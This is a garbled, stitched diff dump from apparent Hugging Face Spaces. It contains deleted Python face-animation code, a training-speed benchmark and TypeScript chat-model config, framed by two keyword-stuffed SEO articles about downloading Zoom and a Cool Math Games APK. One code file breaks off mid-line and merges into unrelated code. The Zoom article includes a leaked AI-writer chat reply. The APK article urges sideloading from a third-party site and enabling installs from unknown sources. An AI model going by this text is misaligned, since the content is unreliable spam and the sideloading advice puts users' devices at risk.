      -Download zoom for macbook pro 2021 tutorial
      -Download zoom for macbook pro 2021 step by step guide
      -Download zoom for macbook pro 2021 problems and solutions
      -Download zoom for macbook pro 2021 tips and tricks
      -Download zoom for macbook pro 2021 best practices
      -Download zoom for macbook pro 2021 security and privacy settings
      -Download zoom for macbook pro 2021 features and benefits
      -Download zoom for macbook pro 2021 reviews and ratings
      -Download zoom for macbook pro 2021 alternatives and comparisons
      -Download zoom for macbook pro 2021 FAQs and answers
      -Download zoom for macbook pro 2021 support and help
      -Download zoom for macbook pro 2021 installation and setup
      -Download zoom for macbook pro 2021 system requirements and compatibility
      -Download zoom for macbook pro 2021 updates and upgrades
      -Download zoom for macbook pro 2021 pros and cons
      -Download zoom for macbook pro 2021 discounts and coupons
      -Download zoom for macbook pro 2021 pricing and plans
      -Download zoom for macbook pro 2021 trial and demo
      -Download zoom for macbook pro 2021 license and activation
      -Download zoom for macbook pro 2021 refund and cancellation policy
      -Download zoom for macbook pro 2021 feedback and testimonials
      -Download zoom for macbook pro 2021 success stories and case studies
      -Download zoom for macbook pro 2021 online courses and webinars
      -Download zoom for macbook pro 2021 ebooks and guides
      -Download zoom for macbook pro 2021 videos and podcasts
      -Download zoom for macbook pro 2021 blogs and articles
      -Download zoom for macbook pro 2021 forums and communities
      -Download zoom for macbook pro 2021 newsletters and magazines
      -Download zoom for macbook pro 2021 social media and hashtags
      -Download zoom for macbook pro 2021 infographics and charts
      -Download zoom for macbook pro 2021 statistics and facts
      -Download zoom for macbook pro 2021 trends and predictions
      -Download zoom for macbook pro 2021 challenges and opportunities
      -Download zoom for macbook pro 2021 best practices and recommendations

      -
        -
      • Adjust your settings: You can customize your Zoom settings by clicking on the gear icon at the top right corner of the app window. You can change your preferences for video, audio, recording, keyboard shortcuts, accessibility, and more.
      • -
      • Use keyboard shortcuts: You can use keyboard shortcuts to quickly perform common actions in Zoom, such as mute/unmute, start/stop video, share screen, etc. You can find a list of keyboard shortcuts by clicking on "Keyboard Shortcuts" under "Settings". You can also create your own custom shortcuts if you want.
      • -
      • Record your meetings: You can record your Zoom meetings for future reference or sharing by clicking on "Record" at the bottom of the meeting window. You can choose to record locally on your device or in the cloud (if you have a paid plan). You can access your recordings by clicking on "Meetings" at the top of the app window and then on "Recorded".
      • -
      • Use virtual backgrounds: You can change your background in Zoom to hide your real environment or add some fun to your meetings. You can choose from a variety of preset backgrounds or upload your own images or videos. To use virtual backgrounds, click on "Virtual Background" under "Settings" and select or upload your desired background.
      • -
      • Use breakout rooms: You can split your Zoom meeting into smaller groups for more focused discussions or activities. You can create up to 50 breakout rooms and assign participants manually or automatically. To use breakout rooms, click on "Breakout Rooms" at the bottom of the meeting window and follow the instructions.
      • -
      -

      Conclusion

      -

      In this article, we have shown you how to download and use Zoom on your Macbook Pro 2021. We hope that this guide has helped you to set up and enjoy Zoom on your device. Zoom is a great tool for video conferencing that can help you communicate and collaborate with anyone, anywhere, anytime. Whether you need it for work, school, I have already written the article as per your instructions. There is nothing more to write. If you are satisfied with the article, please let me know. If you have any feedback or suggestions, please feel free to share them with me. Thank you for choosing me as your content writer. I hope you have a great day! ? I'm sorry, but I have already written the article as per your instructions. There is nothing more to write. I have followed your prompt and created a 500-word article with at least 15 headings and subheadings, a table, a conclusion, and five FAQs. I have also used a conversational style, SEO-optimized keywords, and HTML formatting. I have also written " Please review the article and let me know if you are satisfied with it or if you have any feedback or suggestions. I appreciate your cooperation and understanding. Thank you for choosing me as your content writer. I hope you have a great day! ?

      197e85843d
      -
      -
      \ No newline at end of file diff --git a/spaces/fatimahhussain/workoutwizard/home.py b/spaces/fatimahhussain/workoutwizard/home.py deleted file mode 100644 index 62cecfbd703f8cd50a584d4a3671829cc8d8a2b5..0000000000000000000000000000000000000000 --- a/spaces/fatimahhussain/workoutwizard/home.py +++ /dev/null @@ -1,33 +0,0 @@ -import logging - -import streamlit as st - -logger = logging.getLogger() - -st.title("streamlit-webrtc demo!") -st.info( - """👈 Select the demo -""" -) - - -if __name__ == "__main__": - import os - - DEBUG = os.environ.get("DEBUG", "false").lower() not in ["false", "no", "0"] - - logging.basicConfig( - format="[%(asctime)s] %(levelname)7s from %(name)s in %(pathname)s:%(lineno)d: " - "%(message)s", - level=logging.DEBUG if DEBUG else logging.INFO, - force=True, - ) - - fsevents_logger = logging.getLogger("fsevents") - fsevents_logger.setLevel(logging.WARNING) - - aiortc_logger = logging.getLogger("aiortc") - aiortc_logger.setLevel(logging.INFO) - - aioice_logger = logging.getLogger("aioice") - aioice_logger.setLevel(logging.INFO) diff --git a/spaces/fb700/chatglm-fitness-RLHF/src/face3d/models/arcface_torch/docs/speed_benchmark.md b/spaces/fb700/chatglm-fitness-RLHF/src/face3d/models/arcface_torch/docs/speed_benchmark.md deleted file mode 100644 index 055aee0defe2c43a523ced48260242f0f99b7cea..0000000000000000000000000000000000000000 --- a/spaces/fb700/chatglm-fitness-RLHF/src/face3d/models/arcface_torch/docs/speed_benchmark.md +++ /dev/null @@ -1,93 +0,0 @@ -## Test Training Speed - -- Test Commands - -You need to use the following two commands to test the Partial FC training performance. -The number of identites is **3 millions** (synthetic data), turn mixed precision training on, backbone is resnet50, -batch size is 1024. -```shell -# Model Parallel -python -m torch.distributed.launch --nproc_per_node=8 --nnodes=1 --node_rank=0 --master_addr="127.0.0.1" --master_port=1234 train.py configs/3millions -# Partial FC 0.1 -python -m torch.distributed.launch --nproc_per_node=8 --nnodes=1 --node_rank=0 --master_addr="127.0.0.1" --master_port=1234 train.py configs/3millions_pfc -``` - -- GPU Memory - -``` -# (Model Parallel) gpustat -i -[0] Tesla V100-SXM2-32GB | 64'C, 94 % | 30338 / 32510 MB -[1] Tesla V100-SXM2-32GB | 60'C, 99 % | 28876 / 32510 MB -[2] Tesla V100-SXM2-32GB | 60'C, 99 % | 28872 / 32510 MB -[3] Tesla V100-SXM2-32GB | 69'C, 99 % | 28872 / 32510 MB -[4] Tesla V100-SXM2-32GB | 66'C, 99 % | 28888 / 32510 MB -[5] Tesla V100-SXM2-32GB | 60'C, 99 % | 28932 / 32510 MB -[6] Tesla V100-SXM2-32GB | 68'C, 100 % | 28916 / 32510 MB -[7] Tesla V100-SXM2-32GB | 65'C, 99 % | 28860 / 32510 MB - -# (Partial FC 0.1) gpustat -i -[0] Tesla V100-SXM2-32GB | 60'C, 95 % | 10488 / 32510 MB │······················· -[1] Tesla V100-SXM2-32GB | 60'C, 97 % | 10344 / 32510 MB │······················· -[2] Tesla V100-SXM2-32GB | 61'C, 95 % | 10340 / 32510 MB │······················· -[3] Tesla V100-SXM2-32GB | 66'C, 95 % | 10340 / 32510 MB │······················· -[4] Tesla V100-SXM2-32GB | 65'C, 94 % | 10356 / 32510 MB │······················· -[5] Tesla V100-SXM2-32GB | 61'C, 95 % | 10400 / 32510 MB │······················· -[6] Tesla V100-SXM2-32GB | 68'C, 96 % | 10384 / 32510 MB │······················· -[7] Tesla V100-SXM2-32GB | 64'C, 95 % | 10328 / 32510 MB │······················· -``` - -- Training Speed - -```python -# (Model Parallel) trainging.log -Training: Speed 2271.33 samples/sec Loss 1.1624 LearningRate 0.2000 Epoch: 0 Global Step: 100 -Training: Speed 2269.94 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 150 -Training: Speed 2272.67 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 200 -Training: Speed 2266.55 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 250 -Training: Speed 2272.54 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 300 - -# (Partial FC 0.1) trainging.log -Training: Speed 5299.56 samples/sec Loss 1.0965 LearningRate 0.2000 Epoch: 0 Global Step: 100 -Training: Speed 5296.37 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 150 -Training: Speed 5304.37 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 200 -Training: Speed 5274.43 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 250 -Training: Speed 5300.10 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 300 -``` - -In this test case, Partial FC 0.1 only use1 1/3 of the GPU memory of the model parallel, -and the training speed is 2.5 times faster than the model parallel. - - -## Speed Benchmark - -1. Training speed of different parallel methods (samples/second), Tesla V100 32GB * 8. (Larger is better) - -| Number of Identities in Dataset | Data Parallel | Model Parallel | Partial FC 0.1 | -| :--- | :--- | :--- | :--- | -|125000 | 4681 | 4824 | 5004 | -|250000 | 4047 | 4521 | 4976 | -|500000 | 3087 | 4013 | 4900 | -|1000000 | 2090 | 3449 | 4803 | -|1400000 | 1672 | 3043 | 4738 | -|2000000 | - | 2593 | 4626 | -|4000000 | - | 1748 | 4208 | -|5500000 | - | 1389 | 3975 | -|8000000 | - | - | 3565 | -|16000000 | - | - | 2679 | -|29000000 | - | - | 1855 | - -2. GPU memory cost of different parallel methods (GB per GPU), Tesla V100 32GB * 8. (Smaller is better) - -| Number of Identities in Dataset | Data Parallel | Model Parallel | Partial FC 0.1 | -| :--- | :--- | :--- | :--- | -|125000 | 7358 | 5306 | 4868 | -|250000 | 9940 | 5826 | 5004 | -|500000 | 14220 | 7114 | 5202 | -|1000000 | 23708 | 9966 | 5620 | -|1400000 | 32252 | 11178 | 6056 | -|2000000 | - | 13978 | 6472 | -|4000000 | - | 23238 | 8284 | -|5500000 | - | 32188 | 9854 | -|8000000 | - | - | 12310 | -|16000000 | - | - | 19950 | -|29000000 | - | - | 32324 | diff --git a/spaces/fb700/chatglm-fitness-RLHF/src/facerender/pirender/face_model.py b/spaces/fb700/chatglm-fitness-RLHF/src/facerender/pirender/face_model.py deleted file mode 100644 index 51692c3f28f08e91d6956efcf528f5be51764721..0000000000000000000000000000000000000000 --- a/spaces/fb700/chatglm-fitness-RLHF/src/facerender/pirender/face_model.py +++ /dev/null @@ -1,178 +0,0 @@ -import functools -import torch -import torch.nn as nn -from .base_function import LayerNorm2d, ADAINHourglass, FineEncoder, FineDecoder - -def convert_flow_to_deformation(flow): - r"""convert flow fields to deformations. - - Args: - flow (tensor): Flow field obtained by the model - Returns: - deformation (tensor): The deformation used for warpping - """ - b,c,h,w = flow.shape - flow_norm = 2 * torch.cat([flow[:,:1,...]/(w-1),flow[:,1:,...]/(h-1)], 1) - grid = make_coordinate_grid(flow) - deformation = grid + flow_norm.permute(0,2,3,1) - return deformation - -def make_coordinate_grid(flow): - r"""obtain coordinate grid with the same size as the flow filed. - - Args: - flow (tensor): Flow field obtained by the model - Returns: - grid (tensor): The grid with the same size as the input flow - """ - b,c,h,w = flow.shape - - x = torch.arange(w).to(flow) - y = torch.arange(h).to(flow) - - x = (2 * (x / (w - 1)) - 1) - y = (2 * (y / (h - 1)) - 1) - - yy = y.view(-1, 1).repeat(1, w) - xx = x.view(1, -1).repeat(h, 1) - - meshed = torch.cat([xx.unsqueeze_(2), yy.unsqueeze_(2)], 2) - meshed = meshed.expand(b, -1, -1, -1) - return meshed - - -def warp_image(source_image, deformation): - r"""warp the input image according to the deformation - - Args: - source_image (tensor): source images to be warpped - deformation (tensor): deformations used to warp the images; value in range (-1, 1) - Returns: - output (tensor): the warpped images - """ - _, h_old, w_old, _ = deformation.shape - _, _, h, w = source_image.shape - if h_old != h or w_old != w: - deformation = deformation.permute(0, 3, 1, 2) - deformation = torch.nn.functional.interpolate(deformation, size=(h, w), mode='bilinear') - deformation = deformation.permute(0, 2, 3, 1) - return torch.nn.functional.grid_sample(source_image, deformation) - - -class FaceGenerator(nn.Module): - def __init__( - self, - mapping_net, - warpping_net, - editing_net, - common - ): - super(FaceGenerator, self).__init__() - self.mapping_net = MappingNet(**mapping_net) - self.warpping_net = WarpingNet(**warpping_net, **common) - self.editing_net = EditingNet(**editing_net, **common) - - def forward( - self, - input_image, - driving_source, - stage=None - ): - if stage == 'warp': - descriptor = self.mapping_net(driving_source) - output = self.warpping_net(input_image, descriptor) - else: - descriptor = self.mapping_net(driving_source) - output = self.warpping_net(input_image, descriptor) - output['fake_image'] = self.editing_net(input_image, output['warp_image'], descriptor) - return output - -class MappingNet(nn.Module): - def __init__(self, coeff_nc, descriptor_nc, layer): - super( MappingNet, self).__init__() - - self.layer = layer - nonlinearity = nn.LeakyReLU(0.1) - - self.first = nn.Sequential( - torch.nn.Conv1d(coeff_nc, descriptor_nc, kernel_size=7, padding=0, bias=True)) - - for i in range(layer): - net = nn.Sequential(nonlinearity, - torch.nn.Conv1d(descriptor_nc, descriptor_nc, kernel_size=3, padding=0, dilation=3)) - setattr(self, 'encoder' + str(i), net) - - self.pooling = nn.AdaptiveAvgPool1d(1) - self.output_nc = descriptor_nc - - def forward(self, input_3dmm): - out = self.first(input_3dmm) - for i in range(self.layer): - model = getattr(self, 'encoder' + str(i)) - out = model(out) + out[:,:,3:-3] - out = self.pooling(out) - return out - -class WarpingNet(nn.Module): - def __init__( - self, - image_nc, - descriptor_nc, - base_nc, - max_nc, - encoder_layer, - decoder_layer, - use_spect - ): - super( WarpingNet, self).__init__() - - nonlinearity = nn.LeakyReLU(0.1) - norm_layer = functools.partial(LayerNorm2d, affine=True) - kwargs = {'nonlinearity':nonlinearity, 'use_spect':use_spect} - - self.descriptor_nc = descriptor_nc - self.hourglass = ADAINHourglass(image_nc, self.descriptor_nc, base_nc, - max_nc, encoder_layer, decoder_layer, **kwargs) - - self.flow_out = nn.Sequential(norm_layer(self.hourglass.output_nc), - nonlinearity, - nn.Conv2d(self.hourglass.output_nc, 2, kernel_size=7, stride=1, padding=3)) - - self.pool = nn.AdaptiveAvgPool2d(1) - - def forward(self, input_image, descriptor): - final_output={} - output = self.hourglass(input_image, descriptor) - final_output['flow_field'] = self.flow_out(output) - - deformation = convert_flow_to_deformation(final_output['flow_field']) - final_output['warp_image'] = warp_image(input_image, deformation) - return final_output - - -class EditingNet(nn.Module): - def __init__( - self, - image_nc, - descriptor_nc, - layer, - base_nc, - max_nc, - num_res_blocks, - use_spect): - super(EditingNet, self).__init__() - - nonlinearity = nn.LeakyReLU(0.1) - norm_layer = functools.partial(LayerNorm2d, affine=True) - kwargs = {'norm_layer':norm_layer, 'nonlinearity':nonlinearity, 'use_spect':use_spect} - self.descriptor_nc = descriptor_nc - - # encoder part - self.encoder = FineEncoder(image_nc*2, base_nc, max_nc, layer, **kwargs) - self.decoder = FineDecoder(image_nc, self.descriptor_nc, base_nc, max_nc, layer, num_res_blocks, **kwargs) - - def forward(self, input_image, warp_image, descriptor): - x = torch.cat([input_image, warp_image], 1) - x = self.encoder(x) - gen_image = self.decoder(x, descriptor) - return gen_image diff --git a/spaces/fb700/chatglm-fitness-RLHF/src/generate_batch.py b/spaces/fb700/chatglm-fitness-RLHF/src/generate_batch.py deleted file mode 100644 index 95f21526feea846977707e97394132d43225c02a..0000000000000000000000000000000000000000 --- a/spaces/fb700/chatglm-fitness-RLHF/src/generate_batch.py +++ /dev/null @@ -1,120 +0,0 @@ -import os - -from tqdm import tqdm -import torch -import numpy as np -import random -import scipy.io as scio -import src.utils.audio as audio - -def crop_pad_audio(wav, audio_length): - if len(wav) > audio_length: - wav = wav[:audio_length] - elif len(wav) < audio_length: - wav = np.pad(wav, [0, audio_length - len(wav)], mode='constant', constant_values=0) - return wav - -def parse_audio_length(audio_length, sr, fps): - bit_per_frames = sr / fps - - num_frames = int(audio_length / bit_per_frames) - audio_length = int(num_frames * bit_per_frames) - - return audio_length, num_frames - -def generate_blink_seq(num_frames): - ratio = np.zeros((num_frames,1)) - frame_id = 0 - while frame_id in range(num_frames): - start = 80 - if frame_id+start+9<=num_frames - 1: - ratio[frame_id+start:frame_id+start+9, 0] = [0.5,0.6,0.7,0.9,1, 0.9, 0.7,0.6,0.5] - frame_id = frame_id+start+9 - else: - break - return ratio - -def generate_blink_seq_randomly(num_frames): - ratio = np.zeros((num_frames,1)) - if num_frames<=20: - return ratio - frame_id = 0 - while frame_id in range(num_frames): - start = random.choice(range(min(10,num_frames), min(int(num_frames/2), 70))) - if frame_id+start+5<=num_frames - 1: - ratio[frame_id+start:frame_id+start+5, 0] = [0.5, 0.9, 1.0, 0.9, 0.5] - frame_id = frame_id+start+5 - else: - break - return ratio - -def get_data(first_coeff_path, audio_path, device, ref_eyeblink_coeff_path, still=False, idlemode=False, length_of_audio=False, use_blink=True): - - syncnet_mel_step_size = 16 - fps = 25 - - pic_name = os.path.splitext(os.path.split(first_coeff_path)[-1])[0] - audio_name = os.path.splitext(os.path.split(audio_path)[-1])[0] - - - if idlemode: - num_frames = int(length_of_audio * 25) - indiv_mels = np.zeros((num_frames, 80, 16)) - else: - wav = audio.load_wav(audio_path, 16000) - wav_length, num_frames = parse_audio_length(len(wav), 16000, 25) - wav = crop_pad_audio(wav, wav_length) - orig_mel = audio.melspectrogram(wav).T - spec = orig_mel.copy() # nframes 80 - indiv_mels = [] - - for i in tqdm(range(num_frames), 'mel:'): - start_frame_num = i-2 - start_idx = int(80. * (start_frame_num / float(fps))) - end_idx = start_idx + syncnet_mel_step_size - seq = list(range(start_idx, end_idx)) - seq = [ min(max(item, 0), orig_mel.shape[0]-1) for item in seq ] - m = spec[seq, :] - indiv_mels.append(m.T) - indiv_mels = np.asarray(indiv_mels) # T 80 16 - - ratio = generate_blink_seq_randomly(num_frames) # T - source_semantics_path = first_coeff_path - source_semantics_dict = scio.loadmat(source_semantics_path) - ref_coeff = source_semantics_dict['coeff_3dmm'][:1,:70] #1 70 - ref_coeff = np.repeat(ref_coeff, num_frames, axis=0) - - if ref_eyeblink_coeff_path is not None: - ratio[:num_frames] = 0 - refeyeblink_coeff_dict = scio.loadmat(ref_eyeblink_coeff_path) - refeyeblink_coeff = refeyeblink_coeff_dict['coeff_3dmm'][:,:64] - refeyeblink_num_frames = refeyeblink_coeff.shape[0] - if refeyeblink_num_frames void; - update: (updater: (config: ChatConfig) => void) => void; -}; - -export type ModelConfig = ChatConfig["modelConfig"]; - -export const ALL_MODELS = [ - { - name: "gpt-4", - available: false, - }, - { - name: "gpt-4-0314", - available: false, - }, - { - name: "gpt-4-32k", - available: false, - }, - { - name: "gpt-4-32k-0314", - available: false, - }, - { - name: "gpt-3.5-turbo", - available: false, - }, - { - name: "gpt-3.5-turbo-0301", - available: false, - }, - { - name: "qwen-v1", // 通义千问 - available: true, - }, - { - name: "qwen-plus-v1", // 通义千问 - available: true, - }, - { - name: "ERNIE-Bot-turbo", // 文心一言 - available: true, - }, - { - name: "spark", // 讯飞星火 - available: false, - }, - { - name: "llama", // llama - available: false, - }, - { - name: "chatglm", // chatglm-6b - available: false, - }, -] as const; - -export const ALL_BOT = [ - { - name: "OpenAI (VIP)", - available: true, - }, - { - name: "OpenAI绘画 (VIP)", - available: false, - }, - { - name: "必应 (VIP)", - available: false, - }, - { - name: "必应绘画(VIP)", - available: false, - }, - { - name: "万卷 (VIP)", - available: false, - }, - { - name: "Lemur", - available: true, - }, -]; - -export type BotType = (typeof ALL_BOT)[number]["name"]; -export type ModelType = (typeof ALL_MODELS)[number]["name"]; - -export function limitNumber( - x: number, - min: number, - max: number, - defaultValue: number, -) { - if (typeof x !== "number" || isNaN(x)) { - return defaultValue; - } - - return Math.min(max, Math.max(min, x)); -} - -export function limitModel(name: string) { - return ALL_MODELS.some((m) => m.name === name && m.available) - ? name - : ALL_MODELS[4].name; -} - -export function limitBot(name: string) { - return ALL_BOT.some((m) => m.name === name && m.available) - ? name - : ALL_BOT[4].name; -} - -export const ModalConfigValidator = { - bot(x: string) { - return limitBot(x) as BotType; - }, - model(x: string) { - return limitModel(x) as ModelType; - }, - max_tokens(x: number) { - return limitNumber(x, 0, 32000, 2000); - }, - presence_penalty(x: number) { - return limitNumber(x, -2, 2, 0); - }, - temperature(x: number) { - return limitNumber(x, 0, 1, 1); - }, -}; - -export const useAppConfig = create()( - persist( - (set, get) => ({ - ...DEFAULT_CONFIG, - - reset() { - set(() => ({ ...DEFAULT_CONFIG })); - }, - - update(updater) { - const config = { ...get() }; - updater(config); - set(() => config); - }, - }), - { - name: StoreKey.Config, - version: 2, - migrate(persistedState, version) { - if (version === 2) return persistedState as any; - - const state = persistedState as ChatConfig; - state.modelConfig.sendMemory = true; - state.modelConfig.historyMessageCount = 4; - state.modelConfig.compressMessageLengthThreshold = 1000; - state.dontShowMaskSplashScreen = false; - - return state; - }, - }, - ), -); diff --git a/spaces/feregVcuzo/sanity-test-midi/checkpoint/Cool Math Games APK A Free Brain-Training Site with Fun Logic Math and Strategy Mini Games for Everyone.md b/spaces/feregVcuzo/sanity-test-midi/checkpoint/Cool Math Games APK A Free Brain-Training Site with Fun Logic Math and Strategy Mini Games for Everyone.md deleted file mode 100644 index 13ad5a6fb8f3603b9fe019a83c40ecf67090f974..0000000000000000000000000000000000000000 --- a/spaces/feregVcuzo/sanity-test-midi/checkpoint/Cool Math Games APK A Free Brain-Training Site with Fun Logic Math and Strategy Mini Games for Everyone.md +++ /dev/null @@ -1,129 +0,0 @@ - -

      Cool Math Games Download APK: How to Play Fun and Educational Games on Your Android Device

      -

      Do you love playing casual games that also challenge your brain and improve your math skills? If so, you might have heard of Cool Math Games, a website that offers hundreds of fun and educational games for everyone. But did you know that you can also play Cool Math Games on your Android device? In this article, we will show you how to download Cool Math Games APK for Android, and how to play some of the most popular games on the app. Let's get started!

      -

      What are Cool Math Games?

      -

      A brief introduction to the website and the app

      -

      Cool Math Games is a website that was launched in 1997 by Karen Schneider, a math teacher who wanted to make math more fun and accessible for her students. The website features hundreds of games that cover various topics such as logic, strategy, puzzle, physics, trivia, and more. The games are designed to be kid-friendly, with no violence, empty action, or inappropriate language. They are also suitable for adults who want to exercise their brain and have some fun.

      -

      cool math games download apk


      Downloadhttps://gohhs.com/2uPvuP



      -

      In 2015, Cool Math Games released an official app for Android devices, which allows users to play their favorite games from the website on their mobile phones or tablets. The app is free to download and install, and it updates regularly with new games and features. The app has over 1 million downloads and 4.8K reviews on Google Play Store, and it is one of the most popular educational apps on the market.

      -

      The benefits of playing Cool Math Games

      -

      Playing Cool Math Games is not only fun, but also beneficial for your brain and your learning. Here are some of the benefits of playing Cool Math Games:

      -
        -
      • They improve your math skills by making you practice arithmetic, algebra, geometry, fractions, decimals, percentages, and more.
      • -
      • They enhance your logic and reasoning skills by making you solve problems, find patterns, plan strategies, and think creatively.
      • -
      • They boost your memory and concentration by making you remember facts, follow instructions, and focus on tasks.
      • -
      • They stimulate your curiosity and interest by making you explore different topics, themes, and genres.
      • -
      • They entertain you and make you happy by making you laugh, smile, and have fun.
      • -
      -

      How to Download Cool Math Games APK for Android

      -

      The steps to download and install the app from Google Play Store

      -

      The easiest way to download Cool Math Games APK for Android is to use Google Play Store. Here are the steps to do so:

      -
        -
      1. Open Google Play Store on your Android device.
      2. -
      3. Search for "Coolmath Games Fun Mini Games" or use this link to go directly to the app page.
      4. -
      5. Tap on "Install" and wait for the app to download and install on your device.
      6. -
      7. Tap on "Open" or find the app icon on your home screen or app drawer.
      8. -
      9. Enjoy playing Cool Math Games on your Android device!
      10. -
      -

      The steps to download and install the app from APKCombo

      -

      If you cannot access Google Play Store or you want to download the app from another source, you can use APKCombo, a website that provides APK files for various apps and games. Here are the steps to do so:

      -
        -
      1. Open your web browser on your Android device and go to this link to access the Cool Math Games APK page on APKCombo.
      2. -
      3. Tap on "Download APK" and choose the version and size of the app that you want to download.
      4. -
      5. Wait for the app to download on your device. You may need to allow your browser to download files from unknown sources.
      6. -
      7. Once the download is complete, open the file manager on your device and find the downloaded APK file.
      8. -
      9. Tap on the file and follow the instructions to install the app on your device. You may need to enable the installation of apps from unknown sources in your settings.
      10. -
      11. Find the app icon on your home screen or app drawer and tap on it.
      12. -
      13. Enjoy playing Cool Math Games on your Android device!
      14. -
      -

      How to Play Cool Math Games on Your Android Device

      -

      The features and categories of the app

      -

      The Cool Math Games app has a simple and user-friendly interface that allows you to easily access and play hundreds of games. The app has the following features and categories:

      -
        -
      • A home screen that shows you the latest and most popular games, as well as some recommended games based on your preferences.
      • -
      • A menu button that lets you access the settings, feedback, help, and more options.
      • -
      • A search button that lets you find any game by name or keyword.
      • -
      • A category button that lets you browse games by different genres, such as logic, skill, numbers, strategy, trivia, physics, adventure, and more.
      • -
      • A favorites button that lets you save and access your favorite games anytime.
      • -
      • A history button that lets you see and replay your recently played games.
      • -
      -

      Some examples of popular games and how to play them

      -

      The Cool Math Games app has a variety of games that suit different tastes and levels. Here are some examples of popular games and how to play them:

      - - - - - - - -
      Game NameDescriptionHow to Play
      Fireboy and WatergirlA puzzle-platformer game where you control two characters with opposite elements and try to reach the exit of each level.Use the arrow keys to move Fireboy and the WASD keys to move Watergirl. Avoid hazards such as fire, water, green goo, and spikes. Collect gems and activate switches to unlock doors and platforms. Work together to reach the exit of each level as fast as possible.
      Run 3A running game where you control an alien who runs through a tunnel in space and tries to avoid falling into the void.Use the left and right arrow keys to move sideways and the spacebar to jump. Avoid gaps and obstacles in the tunnel. Collect power-ups and coins to unlock new characters and upgrades. Run as far as you can without falling off.
      Sugar SugarA drawing game where you have to draw lines to guide sugar into different cups.Use your mouse or finger to draw lines on the screen. The sugar will follow the lines and fall into the cups. Each cup has a number that indicates how much sugar it needs. You can also use filters, gravity switches, fans, and other tools to manipulate the sugar. Complete all levels with three stars.
      Parking FuryA driving game where you have to park different vehicles in various parking spots.Use the arrow keys or WASD keys to drive the vehicle. Use the spacebar to brake. Follow the yellow arrows to find your parking spot. Avoid hitting other cars or objects. Park your vehicle as fast and as accurately as possible.
      2048A math game where you have to slide tiles with numbers and combine them to reach 2048.Use the arrow keys or swipe on the screen to slide all tiles in one direction. When two tiles with the same number touch, they merge into one tile with their sum. Try to create a tile with 2048 before the board is full.
      -

      Conclusion

      -

      A summary of the main points and a call to action

      -

      Cool Math Games is a website and an app that offers hundreds of fun and educational games for everyone. You can play Cool Math Games on your Android device by downloading and installing the app from Google Play Store or APKCombo. You can enjoy playing various games that improve your math, logic, memory, and other skills. You can also explore different categories, save your favorites, and replay your history. Cool Math Games is a great way to have fun and learn at the same time. If you are looking for a cool math game to play right now, why not try one of the examples we mentioned above? Or you can search for any game you like on the app. You will surely find something that suits your taste and level. Download Cool Math Games APK for Android today and start playing!

      FAQs

      -

      Q1: Are Cool Math Games safe for kids?

      -

      A1: Yes, Cool Math Games are safe for kids. The games are designed to be kid-friendly, with no violence, empty action, or inappropriate language. They are also educational and beneficial for kids' learning and development.

      -

      Q2: Do Cool Math Games require internet connection?

      -

      A2: Yes, Cool Math Games require internet connection to play. However, some games can be played offline once they are loaded on your device.

      -

      cool math games app download apk
      -cool math games free download for android
      -cool math games offline apk
      -cool math games apk mod
      -cool math games apk latest version
      -cool math games apk for pc
      -cool math games apk pure
      -cool math games apk mirror
      -cool math games apk old version
      -cool math games apk no ads
      -cool math games apk revdl
      -cool math games apk uptodown
      -cool math games apk hack
      -cool math games apk full version
      -cool math games apk pro
      -cool math games apk unlimited money
      -cool math games apk rexdl
      -cool math games apk obb
      -cool math games apk cracked
      -cool math games apk premium
      -cool math games apk unlocked
      -cool math games apk android 1
      -cool math games apk android oyun club
      -cool math games apk apkpure
      -cool math games apk apkmirror
      -cool math games download for tablet
      -cool math games download for chromebook
      -cool math games download for windows 10
      -cool math games download for laptop
      -cool math games download for mac
      -cool math games download for pc free
      -cool math games download for ios
      -cool math games download for iphone
      -cool math games download for ipad
      -cool math games download for kindle fire
      -cool math games download for fire tablet
      -cool math games download for samsung galaxy tab a7 lite 8.7 inch tablet 2021 release (sm-t220/t225/t227)
      -how to download cool math games on android phone
      -how to download cool math games on chromebook without google play store
      -how to download cool math games on pc without bluestacks emulator
      -how to download cool math games on macbook air/pro/m1 chip 2021 model
      -how to download cool math games on iphone/ipad/ipod touch without jailbreak or app store
      -how to download cool math games on kindle fire hd 8/10 (11th generation) 2021 release
      -how to download cool math games on fire tablet hd 8 plus/10 plus (11th generation) 2021 release
      -how to download cool math games on samsung galaxy tab s7/s7 plus/s7 fe 5g 12.4 inch tablet 2021 release (sm-t730/t735/t736/t737/t738/t970/t975/t976/t978)
      -best site to download cool math games apk for android devices
      -best site to download cool math games apk for pc windows/mac/linux
      -best site to download cool math games apk for ios devices
      -best site to download cool math games apk for fire devices
      -best site to download cool math games apk for samsung devices

      -

      Q3: How can I contact the developers of Cool Math Games?

      -

      A3: You can contact the developers of Cool Math Games by using the feedback option on the app menu. You can also visit their website or their Facebook page to get in touch with them.

      -

      Q4: What are some alternatives to Cool Math Games?

      -

      A4: Some alternatives to Cool Math Games are:

      -
        -
      • Math Playground: A website and an app that offers math games, logic games, word problems, videos, and worksheets for grades 1-6.
      • -
      • Prodigy: A website and an app that offers an adaptive math learning platform that aligns with curriculum standards for grades 1-8.
      • -
      • BrainPOP: A website and an app that offers animated videos, quizzes, games, and activities for various subjects, including math, science, social studies, and more.
      • -
      -

      Q5: How can I rate and review Cool Math Games?

      -

      A5: You can rate and review Cool Math Games by using the rate option on the app menu. You can also leave a review on Google Play Store or APKCombo to share your feedback and experience with other users.

      197e85843d
      -
      -
